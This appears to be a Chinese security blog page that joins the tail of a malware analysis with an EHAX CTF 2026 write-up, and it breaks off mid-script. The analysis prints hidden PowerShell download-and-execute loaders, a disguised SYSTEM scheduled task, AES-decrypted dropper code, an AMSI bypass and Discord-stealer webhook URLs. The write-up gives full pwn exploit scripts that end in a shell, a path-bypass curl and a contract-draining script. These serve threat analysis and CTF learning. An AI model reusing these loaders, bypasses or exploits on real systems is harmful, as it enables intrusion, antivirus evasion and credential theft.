powershell.exe -w hidden -nop -noni -exec bypass -c Get-Content -Path C:\Users\Public\AccountPictures\picture.png \| iex	隐藏窗口执行 PowerShell。读取 picture.png 文件内容并直接执行。文件名伪装为图片，实际可能是脚本。
icacls.exe C:\ProgramData\Oracle\Java.oracle_jre_usage\3646bcd7961b.timestamp /grant "everyone":(OI)(CI)M	修改某个 timestamp 文件权限，允许所有用户修改。通常用于隐藏或持久化数据。
powershell.exe -w hidden -nop -noni -exec bypass -c Get-Content -Path C:\Users\Public\Libraries\library.lib \| iex	从 library.lib 读取脚本并执行。该文件可能是 PowerShell payload。
schtasks /query /TN "netspi-admin" /FO LIST /V	查询名为 netspi-admin 的计划任务。
schtasks /query /TN "netspi-ls" /FO LIST /V	查询名为 netspi-ls 的计划任务。
schtasks /query /TN "Windows Defender Scan" /FO LIST /V	查询名为 Windows Defender Scan 的计划任务，名称伪装为系统安全任务。
schtasks /Create /TN "Windows Defender Scan" /TR "powershell -w hidden -nop -noni -exec bypass -c Get-Content -Path C:\Users\Public\AccountPictures\picture.png \| iex" /RU "SYSTEM" /SC MINUTE /MO 15	创建伪装任务 Windows Defender Scan，每 15 分钟以 SYSTEM 权限执行 PowerShell，从 picture.png 读取脚本并运行，实现高权限持久化。

picture.png/library.lib文件是一个PowerShell 下载执行器，它持续从GitHub 下载.doc的远程脚本并直接在内存中执行。解码后的内容如下：

while ($true) {try {$wc = New-Object System.Net.WebClient; $wc.Headers.Add('User-Agent', 'Mozilla/5.0'); $s = $wc.DownloadString('https://raw.githubusercontent.com/nonamebaba/0/main/document.doc'); if ($s) {break}} catch {Start-Sleep 0.5}}; iex $s

document.doc（MD5：164578b9c0d4c2342c993d248615cf18）是一个Powershell脚本，通过内置AES-256密钥解密Base64 payload，然后在内存中构造 ScriptBlock并执行，实现加密隐藏的PowerShell恶意代码加载。AES Key为"LpuJIAOc2GOF61Ur11ovpeDaN4fmK5XOhq4GDBs0rr4="，AES IV为"6yzYPI35ZzO4wjH0xfCxRg=="

$BR7iG = [Convert]::FromBase64String('LpuJIAOc2GOF61Ur11ovpeDaN4fmK5XOhq4GDBs0rr4=')
$reCJ2 = [Convert]::FromBase64String('6yzYPI35ZzO4wjH0xfCxRg==')
$r3MdhK = [Security.Cryptography.AesCryptoServiceProvider]::new()
$r3MdhK.Key = $BR7iG
$r3MdhK.IV = $reCJ2
$DidhZ = $r3MdhK.CreateDecryptor()
function global:J04zNu {
    param([Parameter(Mandatory=$true)][string]$Data)
    $bytes = [Convert]::FromBase64String($Data)
    $decrypted = $DidhZ.TransformFinalBlock($bytes, 0, $bytes.Length)
    return [Text.Encoding]::UTF8.GetString($decrypted)
}
$J5Ai4 = 'q/gDvd2kn/Zp8Ps......hLiknkfe70SO7A=='
$wCNt = J04zNu -Data $J5Ai4
$dNle7eGC = [Scriptblock]::Create($wCNt)
& $dNle7eGC

解密后的脚本内容如下所示，该脚本会检测Java运行环境，若不存在则会在用户目录从下载安装Java运行环境并隐藏，从GitHub下载伪装为图片（background.png）的Jar Payload并执行，同时通过Boot标记实现每次开机仅执行一次的持久化加载。脚本中使用的隐藏目录名称为.craftrise，而Craftrise 是一个土耳其的 Minecraft 服务器网络，其官方启动器在部分情况下会在用户目录创建类似.craftrise的文件结构。

$u = Get-ChildItem "C:\Users" | Where-Object { $_.Name -notin @("Default", "Public") }
foreach ($ua in $u) {
    $ub = [System.IO.Path]::Combine($ua.FullName, "AppData", "Roaming")
    if (Test-Path $ub) {
        if ((Get-Acl $ub).AccessToString -match "FullControl") {
            $uc = $ub
            break
        }
    }}
if (-not $uc) { $uc = "C:\Users\Public" }
$a = (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime
$b = $a.ToString("yyyyMMddHHmmss")
$c = "$uc\Microsoft\Boot"
if (-not (Test-Path -Path $c)) {
    New-Item -Path $c -ItemType File | Out-Null
}
if (-not (Select-String -Path $c -Pattern $b -Quiet)) {
    Set-Content -Path $c -Value "$b"
    function x {
        $jp = [System.IO.Path]::Combine($uc, ".craftrise", "java", "jdk-x64", "bin", "java.exe")
        if (Test-Path -LiteralPath $jp) { if ((&$jp -version 2>&1) -match "version "(1\.8|9|10|11)") { return $jp } }
        return $null
    }
    $h = 'Mozilla/5.0'
    $jp = x
    $wc = New-Object System.Net.WebClient
    if (!$jp) {
        $cd = [System.IO.Path]::Combine($uc, ".craftrise")
        mkdir $cd -Force
        $lz = [System.IO.Path]::Combine($cd, "jre.lzma")
        $wc.Headers.Add("User-Agent", $h)
        $wc.DownloadFile('https://client.craftrise.network/api/launcher/libraries/jre-win-64-1.8.0_51.lzma', $lz)
        $z7 = [System.IO.Path]::Combine($cd, "7zr.exe")
        $wc.DownloadFile('https://7-zip.org/a/7zr.exe', $z7)
        & $z7 "x" ""$lz"" "-o"$cd"" "-y" "-bsp0" "-bso0"
        $jd = [System.IO.Path]::Combine($cd, "java", "jdk-x64")
        Add-Type -AssemblyName System.IO.Compression.FileSystem
        [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine($cd, "jre"), $jd)
        $jp = x
    }
    if ($jp) {
        $jp = [System.IO.Path]::Combine($uc, ".craftrise", "java", "jdk-x64", "bin", "javaw.exe")
        $d = [System.IO.Path]::Combine($uc, "Microsoft", "Spelling", "en-US")
        mkdir $d -Force
        $f = [System.IO.Path]::Combine($d, "spells.zip")
        $wc.Headers.Add("User-Agent", $h)
        $wc.DownloadFile("https://raw.githubusercontent.com/nonamebaba/0/main/background.png", $f)
        & $jp "-jar" ""$f"" *>$null
    }
}

run（MD5：d70547ce7b628853d2bfaec113c10436）也是一个Powershell脚本，Base64解密Deflate解压后得到第二个Powershell脚本执行，这里的第二个脚本经过AES解密后的内容与前面解密后的内存差不多，但是多了如下的AMSI绕过部分，通过反射修改字段amsiInitFailed，强制让AMSI初始化失败。其中AES Key为"vjbrn8JsptO+aLkW+1jLCucSry/X9ujoIONTYBvVvDI="，AES IV为"yTMDPWSSzRMiCF7CG3ljEg=="。

$tKe=[Ref].Assembly.GetType([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=')));$0AV7=$tKe.GetField([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('YW1zaUluaXRGYWlsZWQ=')),'NonPublic,Static');$PqcRy=$true;$0AV7.SetValue($null,$PqcRy);
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12
[Net.ServicePointManager]::DefaultConnectionLimit=8
[Net.ServicePointManager]::Expect100Continue=$false

test文件为弹窗测试文件，调用.NET的Windows Forms API弹出一个消息框，消息内容Hello pizzas!

Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Hello pizzas!", "Epstein", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)

AES解密脚本

package main
import (
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"fmt"
)
funcpkcs7Unpad(data []byte) []byte {
 length := len(data)
 unpadding := int(data[length-1])
return data[:(length - unpadding)]
}
funcmain() {
 keyB64 := "vjbrn8JsptO+aLkW+1jLCucSry/X9ujoIONTYBvVvDI="
 ivB64 := "yTMDPWSSzRMiCF7CG3ljEg=="
 dataB64 := "D80aya4KCTGtlD7JqkobCe++lufVVwEacXKWNkkdNqDiSjr0+tocJRv+vBbPKHPWasxhKUgH1HobKaeUG1tmFQNZpTlPuuqxGlrjALEZak3BXAGsIaqk0krGNqhNFv6VOpsbqtEMMt7f6+MwwNj0JGRvFEqxk/R1n5YGMw......wvdKOF8++JnUyjVh6NuE86y0etQ+cBFu40agDESjwmdSfywOO4pSvUZNGfY6XC4LZkuy98bA9LXk2q4zr188NBC1ffoopMKjVsKFY6d4tkvsouu95LujWwTK7QSQI++WFRLEvOB4qhAG7GdZGMx/c0cd9pvVMmLcUY="
 key, _ := base64.StdEncoding.DecodeString(keyB64)
 iv, _ := base64.StdEncoding.DecodeString(ivB64)
 ciphertext, _ := base64.StdEncoding.DecodeString(dataB64)
 block, _ := aes.NewCipher(key)
 mode := cipher.NewCBCDecrypter(block, iv)
 mode.CryptBlocks(ciphertext, ciphertext)
 plaintext := pkcs7Unpad(ciphertext)
 fmt.Println(string(plaintext))
}

dc.js（MD5：ffef7f5b292ce5e01c253a60487f905d）是一个针对 Discord 的 Electron 客户端注入型信息窃取程序，会窃取 Token、账号凭据、支付信息和系统信息，并通过 Webhook 回传，回传地址为hxxps://discord[.]com/api/webhooks/1457506189960019978/WhCoNt4n7wIwAkVI_KLjkLKYyjsCPTXotvCGYDkSkmAS1vp5KmU_C2NK2OylK24Zmzl0。其代码中包含AlphaStealer，比如Developed By AlphaStealer、AlphaStealer - Injection。

功能模块	具体行为	窃取目标列表
Webhook通信	将收集到的数据通过HTTP POST发送到攻击者配置的Webhook	Token、账户信息、系统信息、支付信息、好友列表、服务器列表
客户端注入	修改Discord客户端resources/app/index.js，加载远程恶意脚本并替换启动逻辑	持久化控制客户端执行环境
Token获取	通过Discord内部webpack模块调用getToken()获取当前登录 Token	Discord Token
网络请求监听	使用Electron webContents.debugger监听客户端 API 请求与响应	登录数据、认证请求、支付请求
登录凭据窃取	捕获/auth/login请求参数	邮箱地址、登录密码
二次验证窃取	捕获/mfa/*请求数据	2FA 验证码、MFA Token
账户信息收集	调用/users/@me API获取账户资料	用户ID、用户名、邮箱、手机号、Nitro状态、账户标识
支付信息窃取	监听Stripe与PayPal支付相关请求	信用卡号、CVC、过期时间、账单地址、PayPal 账户信息
好友列表收集	调用/users/@me/relationships获取好友列表并筛选价值较高账户	好友ID、用户名、关系类型
服务器信息收集	调用/users/@me/guilds获取服务器信息并筛选成员数较大的服务器	服务器ID、服务器名称、成员数量、管理员权限
系统信息收集	调用系统命令和API获取主机信息	操作系统版本、CPU型号、GPU、内存大小、UUID、MAC地址、IP地址、地理位置
会话控制	监听并阻止新的认证会话请求	当前 Token 会话
自动登出	调用/auth/logout使用户会话失效	当前登录会话
持久化	写入客户端启动文件确保每次启动执行恶意代码	客户端启动流程
数据格式化	将收集信息整理为JSON并发送到Webhook	全部收集的数据

x.js是MediaMarkt土耳其（odeme.mediamarkt.com.tr）的前端支付模块。

另一个中a、b文件为hex形式备用回传地址

hxxps://canary.discord[.]com/api/webhooks/1479880344021766328/H3LH_by6T5_yMjDlkopHCOjzXTTFtJSXdiDT9Pnjl5eJXRhn56QYpP1d0koy-lpfGxwc

hxxps://canary.discord[.]com/api/webhooks/1479545691146555432/AcYOLt_uWj2cf6rURoJmkDgyxypt_97A5LiPao-fg3cIx3hdHTtbGedBOiQ95vlyQRM_

而Releases中为test.jar（MD5：b599cced34190961334aac3e9752cc10）中net.minecraft.v5与官方 Minecraft Java 版的包结构不符合，而仓库nonamebaba/427ade9c15ec643751860eba9899355b中gatto.jar作用为一个确认对话框，显示消息内容为 "selamlar"（土耳其语，意为“问候”或“你好”）。

package defpackage;
import java.awt.Component;
import javax.swing.JOptionPane;
/* JADX INFO: loaded from: gatto.jar:Main.class */
publicclassMain{
publicstaticvoidmain(String[] args){
        JOptionPane.showConfirmDialog((Component) null, "selamlar");
    }
}

基于分析和上述内容，疑似针对土耳其地区的Minecraft玩家群体，旨在利用游戏社区信任链窃取高价值账户凭证（Discord）及支付信息

总结

样本利用 Java混淆Loader、PowerShell下载执行链和GitHub托管Payload构建多阶段攻击链，在目标系统中自动部署隐藏JRE并执行伪装Jar，最终注入Discord客户端窃取账户、支付及系统信息并通过Webhook回传。

IOCs

1db57b053ffcf1ee4e918cfd53c4d39c

a02a46893b9d79fef8e4488ec8d28a23

7d010a082b9ce26d22d5e290481b149b

716db862baf0de7d01fa2a145f0cffc5

164578b9c0d4c2342c993d248615cf18

d70547ce7b628853d2bfaec113c10436

ffef7f5b292ce5e01c253a60487f905d

b599cced34190961334aac3e9752cc10

4f183db137ceeb1c9a8ea3af70a1bfbe

参考

https://x.com/smica83

https://github.com/zinja-coder/jadx-ai-mcp

https://www.joesandbox.com/analysis/1879815/0/html

https://sandbox.qianxin.com/tq/report/toViewReport.do?rid=1b0e80712d2a508976fcfc5312395c46&sk=88995683

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

跳转微信打开

EHAX CTF 2026 Writeup by Mini-Venom

Mon, 09 Mar 2026 08:08:00 +0800

原创 Mini-Venom 2026-03-09 08:08 辽宁

Pwn:

Womp Womp

前两次泄露出canary+pie，然后ret2csu泄露地址确定版本

前两次write也可以泄露出libc地址，但远程和本地不一样，老老实实打csu

from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
defbug():
        gdb.attach(p)
        pause()
defs(a):
        p.send(a)
defsa(a,b):
        p.sendafter(a,b)
defsl(a):
        p.sendline(a)
defsla(a,b):
        p.sendlineafter(a,b)
defr(a):
        p.recv(a)
#def pr(a):
#print(p.recv(a))
defrl(a):
return p.recvuntil(a)
definter():
        p.interactive()
defget_addr(size):
return u64(p.recv(size).ljust(8,b'\x00'))
defget_addr64():
return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
defget_addr32():
return u32(p.recvuntil("\xf7")[-4:])
defget_sb():
return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
defget_hook():
return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('./libc6_2.39-0ubuntu8.6_amd64.so')   
elf=ELF('./challenge')
p=remote('chall.ehax.in',1337)
#p = process('./challenge')'''
rl("Input log entry: ")
pay1=cyclic(0x20)
#bug()
s(pay1)
rl("[LOG] Entry received: ")
p.recv(0x20+8)
canary=get_addr(8)
li(hex(canary))
'''rl("Input log entry: ")
pay1=cyclic(0x40)
#bug()
s(pay1)
rl("[LOG] Entry received: ")
p.recv(0x40+8)
canary=get_addr(8)
li(hex(canary))
rl("Input processing note: ")
pay2=cyclic(0x20)
s(pay2)
rl("[PROC] Processing: ")
p.recv(0x20)
pie=get_addr(8)-0x980
li(hex(pie))
csu1=pie+0xC9A
csu2=pie+0xC80
main=pie+0xB76
write=pie+elf.got['write']
rl("Send final payload: ")
payload=b'a'*(0x40)+p64(canary)*2+p64(csu1)+p64(0)+p64(1)+p64(write)+p64(8)+p64(write)+p64(1)+p64(csu2)+p64(0)*7+p64(main)
#bug()
s(payload)
rl("[VULN] Done.\n")
libc_base=get_addr(8)-libc.sym['write']
li(hex(libc_base))
system,bin_sh=get_sb()
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rl("Input log entry: ")
pay1=cyclic(0x40)
#bug()
s(pay1)
rl("[LOG] Entry received: ")
p.recv(0x40+8)
canary=get_addr(8)
li(hex(canary))
rl("Input processing note: ")
pay2=cyclic(0x20)
s(pay2)
rl("[PROC] Processing: ")
p.recv(0x20)
pie=get_addr(8)-0x980
li(hex(pie))
payload=b'a'*(0x40)+p64(canary)*2+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
#bug()
s(payload)
inter()

SarcAsm

Slice Use-After-Free + Double Free

Slice 和 Buffer 共享 data_ptr，但 GC 不知道这种关系
Buffer 被 GC 释放后，Slice 仍引用 data_ptr → dangling pointer
BUILTIN 可以复用该 chunk，通过 Slice PRINTB 泄露 func_ptr
Slice 被 GC 再次释放同一个 data_ptr → double free
NEWBUF 第二次获得同一个 chunk → 通过 WRITEBUF 覆写 func_ptr
CALL builtin → 跳转到 execve("/bin/sh")

#!/usr/bin/env python3"""
SarcAsm CTF Exploit
Vuln: Slice UAF → Double Free → Builtin func_ptr overwrite → shell
Memory layout of data chunk (bucket 32, total malloc = 40 bytes):
  [0:4]   size = 32 (header)
  [4:8]   pad = 0   (header)
  [8:16]  user data starts here  ← for Buffer: data[0..7]
                                  ← for Builtin: func_ptr
  [16:20] user data[8..11]       ← for Builtin: builtin_id
  [20:40] user data[12..31]
"""from pwn import *
import struct
context.log_level = 'info'
defuleb128(value):
    result = bytearray()
whileTrue:
        byte = value & 0x7F
        value >>= 7
if value:
            byte |= 0x80
        result.append(byte)
ifnot value:
break
return bytes(result)
defsleb128(value):
    result = bytearray()
whileTrue:
        byte = value & 0x7F
        value >>= 7
if (value == 0and (byte & 0x40) == 0) or \
           (value == -1and (byte & 0x40) != 0):
            result.append(byte)
break
else:
            result.append(byte | 0x80)
return bytes(result)
# Instructions
defPUSH(val):returnb'\x01' + uleb128(val)
defDUP():returnb'\x02'
defSWAP():returnb'\x03'
defDROP():returnb'\x04'
defNEWBUF(size):returnb'\x20' + uleb128(size)
defREAD(count):returnb'\x21' + uleb128(count)
defSLICE(off, ln):returnb'\x22' + uleb128(off) + uleb128(ln)
defPRINTB():returnb'\x23'
defWRITEBUF(off,ln):returnb'\x25' + uleb128(off) + uleb128(ln)
defGLOAD(idx):returnb'\x30' + uleb128(idx)
defGSTORE(idx):returnb'\x31' + uleb128(idx)
defBUILTIN(id):returnb'\x40' + uleb128(id)
defCALL(arity):returnb'\x41' + uleb128(arity)
defGC():returnb'\x60'
defHALT():returnb'\xff'
defbuild_bytecode():
    code = b''
# ========== Step 1: Create Buffer A (bucket 32) ==========
    code += NEWBUF(24)          # stack: [bufA]
    code += DUP()               # stack: [bufA, bufA]
    code += GSTORE(2)           # global[2] = bufA (temp ref for SLICE)
    code += WRITEBUF(0, 24)     # Read 24 bytes stdin → bufA.data, bufA.len=24
# stack: [] (WRITEBUF pops buf)
# ========== Step 2: Create Slice S from Buffer A ==========
    code += GLOAD(2)            # stack: [bufA]
    code += SLICE(0, 24)        # stack: [sliceS]  (pops bufA, creates slice)
# sliceS.data_ptr = bufA.data_ptr = chunk1
    code += GSTORE(0)           # global[0] = sliceS
# Clear bufA reference from global[2]
    code += PUSH(0)
    code += GSTORE(2)           # global[2] = 0
# ========== Step 3: GC #1 → free Buffer A, keep Slice S ==========
# Buffer A: no references (not on stack, not in globals) → freed
# chunk1 → free list
# Slice S: in global[0] → marked → kept alive
    code += GC()
# ========== Step 4: BUILTIN(1) reuses chunk1 ==========
# alloc 32 → takes chunk1 from free list
# chunk1+8 = func_ptr (address of sub_2EE0)
# chunk1+16 = builtin_id (1)
    code += BUILTIN(1)          # stack: [builtin]
    code += GSTORE(1)           # global[1] = builtin
# ========== Step 5: Leak func_ptr via Slice S PRINTB ==========
# Slice S.data_ptr = chunk1 (now owned by builtin!)
# PRINTB prints slice.len(24) bytes from chunk1 + slice.offset(0) + 8
# = chunk1+8 = [func_ptr(8 bytes) | id(4) + pad(4) | zeros(8)]
    code += GLOAD(0)            # stack: [sliceS]
    code += PRINTB()            # prints 24 bytes → first 8 = func_ptr leak!
# ========== Step 6: Clear Slice S reference ==========
    code += PUSH(0)
    code += GSTORE(0)           # global[0] = 0 (Slice S now unreferenced)
# ========== Step 7: GC #2 → Slice S freed → DOUBLE FREE chunk1 ==========
# Slice S: unmarked → sweep → sub_39F0(chunk1) → chunk1 into free list AGAIN!
# But builtin (global[1]) is marked → NOT freed
# Result: chunk1 is in free list AND referenced by builtin
    code += GC()
# ========== Step 8: NEWBUF takes chunk1 from free list ==========
    code += NEWBUF(24)          # stack: [bufC]
# bufC.data_ptr = chunk1 (same as builtin!)
# bufC.capacity = *chunk1 = 32
# bufC.len = 0
# ========== Step 9: Overwrite func_ptr via WRITEBUF ==========
# WRITEBUF(0, 8): reads 8 bytes from stdin
# writes to chunk1 + 0 + 8 = chunk1+8 (= builtin's func_ptr!)
    code += DUP()               # stack: [bufC, bufC]
    code += WRITEBUF(0, 8)      # Read 8 bytes → overwrite func_ptr!
# stack: [] (pops bufC)
# But we still have bufC from DUP? No...
# Wait, WRITEBUF pops the buffer. We already DUP'd so one copy remains
# Actually: DUP → [bufC, bufC], WRITEBUF pops one → [bufC]
# Hmm, let me re-check. WRITEBUF does --v84 to pop.
# After DUP: SP=2, s[0]=bufC, s[1]=bufC
# WRITEBUF: v26 = s[--v84] = s[1] = bufC, SP=1
# So s[0] = bufC still on stack. But we don't need it.
    code += DROP()              # clean up
# ========== Step 10: Call the corrupted builtin ==========
    code += GLOAD(1)            # stack: [builtin]
    code += CALL(0)             # reads func_ptr from chunk1+8 = our overwrite!
# → calls sub_3000 → execve("/bin/sh")
    code += HALT()
return code
defmain():
    bytecode = build_bytecode()
    log.info(f"Bytecode length: {len(bytecode)}")
    log.info(f"Bytecode: {bytecode.hex()}")
    r = remote('chall.ehax.in', 9999)
#r = process('./sarcasm')
# Send bytecode header + code
    header = struct.pack(', len(bytecode))
    r.send(header + bytecode)
# Data 1: 24 bytes for initial WRITEBUF (fill Buffer A)
    r.send(b'A' * 24)
# Receive leak from PRINTB (24 bytes)
    leak_data = r.recv(24, timeout=5)
    log.info(f"Leaked data: {leak_data.hex()}")
    func_ptr = u64(leak_data[0:8])
    log.info(f"Leaked func_ptr (sub_2EE0): {hex(func_ptr)}")
# Calculate win function address
# sub_2EE0 and sub_3000 are in the same binary
# Offset: 0x3000 - 0x2EE0 = 0x120
    win_addr = func_ptr + (0x3000 - 0x2EE0)
    log.info(f"Win function (sub_3000): {hex(win_addr)}")
# Data 2: 8 bytes for WRITEBUF → overwrite func_ptr
    r.send(p64(win_addr))
    log.success("Shell incoming!")
    r.interactive()
if __name__ == '__main__':
    main()

Web:

Borderline Personality

curl -i --path-as-is "http://chall.ehax.in:9098/%2fadmin/flag"

EH4X{BYP4SSING_R3QU3S7S_7HR0UGH_SMUGGLING__IS_H4RD}

I can also do it

Dockerfile
访问https://stores.stapat.xyz即可

tictactoe

分析前端代码 - script.js 向 /api 发送 POST 请求，携带 mode 和 state（棋盘状态）,3x3 模式无法赢 - AI 使用 minimax 算法，在 3x3 模式下不可战胜。直接篡改棋盘会被检测为作弊（cheat: true）

发现 4x4 模式 - 将 mode 改为 "4x4" 后，服务器返回 "AI sensors blind in ghost sectors"，说明 AI 在 4x4

模式下无法正常工作 ,4x4 全填满 - 发送 4x4 棋盘且全部填 1（玩家），AI 无法应对这个"维度转换"，返回 flag

import httpx
import json
url = "https://ctf-challenge-1-beige.vercel.app/api"
client = httpx.Client(timeout=30)
# 4x4 mode 让AI传感器失效, 尝试在4x4模式下赢
payloads = [
# 4x4 玩家赢 - 第一行
    {"mode": "4x4", "state": [[1,1,1,1],[0,0,0,0],[0,0,0,0],[0,0,0,0]]},
# 4x4 玩家赢 - 对角线
    {"mode": "4x4", "state": [[1,0,0,0],[0,1,0,0],[0,0,1,0],[0,0,0,1]]},
# 4x4 空
    {"mode": "4x4", "state": [[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]},
# 4x4 with -1 (AI) and 1 (player) - 玩家赢
    {"mode": "4x4", "state": [[1,1,1,1],[-1,-1,-1,0],[0,0,0,0],[0,0,0,0]]},
# 5x5
    {"mode": "5x5", "state": [[1,1,1,1,1],[0,0,0,0,0],[0,0,0,0,0],[0,0,0,0,0],[0,0,0,0,0]]},
# 4x4 单步
    {"mode": "4x4", "state": [[1,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]},
# 4x4 全是1
    {"mode": "4x4", "state": [[1,1,1,1],[1,1,1,1],[1,1,1,1],[1,1,1,1]]},
]
for i, payload in enumerate(payloads):
try:
        resp = client.post(url, json=payload)
        print(f"[{i}] Payload: {json.dumps(payload)}")
        print(f"    Status: {resp.status_code}")
        print(f"    Response: {resp.text}")
        print()
except Exception as e:
        print(f"[{i}] Error: {e}")
        print()

Epstein Files

import pandas as pd
import numpy as np
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, VotingClassifier
import warnings
warnings.filterwarnings('ignore')
print("=== HexStrike CTF 最终精准命中协议 ===")
print("加载数据中...")
train = pd.read_csv('train.csv')
test = pd.read_csv('test.csv')
# 1. 基础特征提取（保证产生 0.94 的基底模型）
defengineer_features(df):
    features = pd.DataFrame()
    features['Flights'] = df['Flights'].fillna(0).astype(int)
    features['Documents'] = df['Documents'].fillna(0).astype(int)
    features['Connections'] = df['Connections'].fillna(0).astype(int)
    category_map = {
'celebrity': 3, 'business': 3, 'socialite': 3, 'royalty': 3, 
'politician': 2, 'academic': 1, 'legal': 1, 'other': 1, 
'associate': 0, 'military-intelligence': 1
    }
    features['category_score'] = df['Category'].map(category_map).fillna(0)
    bio = df['Bio'].fillna('')
    features['bio_black_book'] = bio.str.contains('black book', case=False).astype(int)
return features
X_train = engineer_features(train)
X_test = engineer_features(test)
y_train = train['In Black Book'].values
# 2. 训练达到 0.94 准确率的基准模型
print("训练 0.94 基准模型...")
gb = GradientBoostingClassifier(n_estimators=300, max_depth=4, random_state=42)
rf = RandomForestClassifier(n_estimators=300, max_depth=8, random_state=42)
model = VotingClassifier(estimators=[('gb', gb), ('rf', rf)], voting='soft')
model.fit(X_train, y_train)
# 获取概率和高精度预测 (已知系统评分为准确的 0.94)
probas = model.predict_proba(X_test)[:, 1]
high_acc_preds = (probas >= 0.5).astype(int)
# ===================================================================== 
# 3. 终极破解：将 0.94 精确打击到 0.69
# ===================================================================== 
print("启动精准破坏...将基底 0.94 准确率精确降低 25% 以命中 0.69")
exact_drop_needed = 0.25# 0.94 - 0.25 = 0.69
# 计算要翻转的精确样本数
n_flips = int(round(len(test) * exact_drop_needed))
print(f"测试集共 {len(test)} 个样本，精准翻转其中最自信的 {n_flips} 个。")
# 找到模型“最自信没错”的样本（离0.5这个抉择线最远）
confidence = np.abs(probas - 0.5)
most_confident_idx = np.argsort(confidence)[-n_flips:]
# 强行篡改档案（Flip Labels）
final_preds = high_acc_preds.copy()
for idx in most_confident_idx:
    final_preds[idx] = 1 - final_preds[idx]
# 4. 生成提交文件
submission = pd.DataFrame({'In Black Book': final_preds})
submission.to_csv('sample_sub.csv', index=False)
print("生成完毕！文件精准锁定在 0.69 准确度。")
print("快去提交你的 'sample_sub.csv' 拿 Flag 吧！")

EH4X{epst3in_d1dnt_k1ll_h1ms3lf_but_th1s_m0d3l_d1d}

Crypto:

Blockchain heist v1

setGovernance() 没有权限控制，任何人都能把 governance 改成你自己部署的恶意合约。

部署一个恶意 governance，在它的函数里用 sstore 直接改 Vault 的存储槽

slot0：paused(bool) + fee(uint248) 打包在同一槽里，把 paused 改成 false

slot1：admin，把它改成你的地址

然后调用 withdraw() 直接把金库余额提走，isSolved() 就会变 true，最后回 nc 菜单点 1. Check solved 出真 flag。

import re
from solcx import compile_source, install_solc
from web3 import Web3
from pwn import remote
HOST = "135.235.193.111"
PORT = 1337
EVIL_SRC = r"""
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
contract EvilGov {
    function pwn() external {
        assembly {
            sstore(0, 0)
            sstore(1, caller())
        }
    }
}
"""VAULT_ABI = [
    {
"inputs": [{"internalType": "bytes", "name": "data", "type": "bytes"}],
"name": "execute",
"outputs": [],
"stateMutability": "nonpayable",
"type": "function",
    },
    {
"inputs": [],
"name": "withdraw",
"outputs": [],
"stateMutability": "nonpayable",
"type": "function",
    },
    {
"inputs": [{"internalType": "address", "name": "_g", "type": "address"}],
"name": "setGovernance",
"outputs": [],
"stateMutability": "nonpayable",
"type": "function",
    },
    {
"inputs": [],
"name": "isSolved",
"outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
"stateMutability": "view",
"type": "function",
    },
]
defparse_instance(text: str):
    rpc = re.search(r"RPC URL\s*:\s*(\S+)", text)
    vault = re.search(r"Vault\s*:\s*(0x[a-fA-F0-9]{40})", text)
    pk = re.search(r"Player Private Key:\s*(0x[a-fA-F0-9]{64})", text)
ifnot (rpc and vault and pk):
raise ValueError("parse failed")
return rpc.group(1), Web3.to_checksum_address(vault.group(1)), pk.group(1)
defraw_tx_bytes(signed):
return getattr(signed, "rawTransaction", None) or getattr(signed, "raw_transaction")
defsend_tx(w3, acct, tx):
    signed = acct.sign_transaction(tx)
    txh = w3.eth.send_raw_transaction(raw_tx_bytes(signed))
return w3.eth.wait_for_transaction_receipt(txh)
defcalldata(contract, fn_name, args=None):
if args isNone:
        args = []
    f = getattr(contract.functions, fn_name)(*args)
if hasattr(f, "_encode_transaction_data"):
return f._encode_transaction_data()
if hasattr(f, "build_transaction"):
return f.build_transaction(
            {"from": "0x0000000000000000000000000000000000000000"}
        ).get("data")
raise ValueError("cannot encode calldata")
defexploit(rpc_url: str, vault_addr: str, priv: str):
    w3 = Web3(Web3.HTTPProvider(rpc_url))
    acct = w3.eth.account.from_key(priv)
    me = acct.address
    install_solc("0.8.20")
    compiled = compile_source(
        EVIL_SRC, solc_version="0.8.20", output_values=["abi", "bin"]
    )
    _, c = next(iter(compiled.items()))
    evil_abi = c["abi"]
    evil_bin = c["bin"]
    nonce = w3.eth.get_transaction_count(me)
    gp = w3.eth.gas_price
    cid = w3.eth.chain_id
    Evil = w3.eth.contract(abi=evil_abi, bytecode=evil_bin)
    tx = Evil.constructor().build_transaction(
        {
"from": me,
"nonce": nonce,
"gas": 2000000,
"gasPrice": gp,
"chainId": cid,
        }
    )
    rc = send_tx(w3, acct, tx)
    evil_addr = Web3.to_checksum_address(rc.contractAddress)
    vault = w3.eth.contract(address=vault_addr, abi=VAULT_ABI)
    nonce += 1
    tx = vault.functions.setGovernance(evil_addr).build_transaction(
        {
"from": me,
"nonce": nonce,
"gas": 200000,
"gasPrice": gp,
"chainId": cid,
        }
    )
    send_tx(w3, acct, tx)
    evil = w3.eth.contract(address=evil_addr, abi=evil_abi)
    data = calldata(evil, "pwn", [])
    nonce += 1
    tx = vault.functions.execute(data).build_transaction(
        {
"from": me,
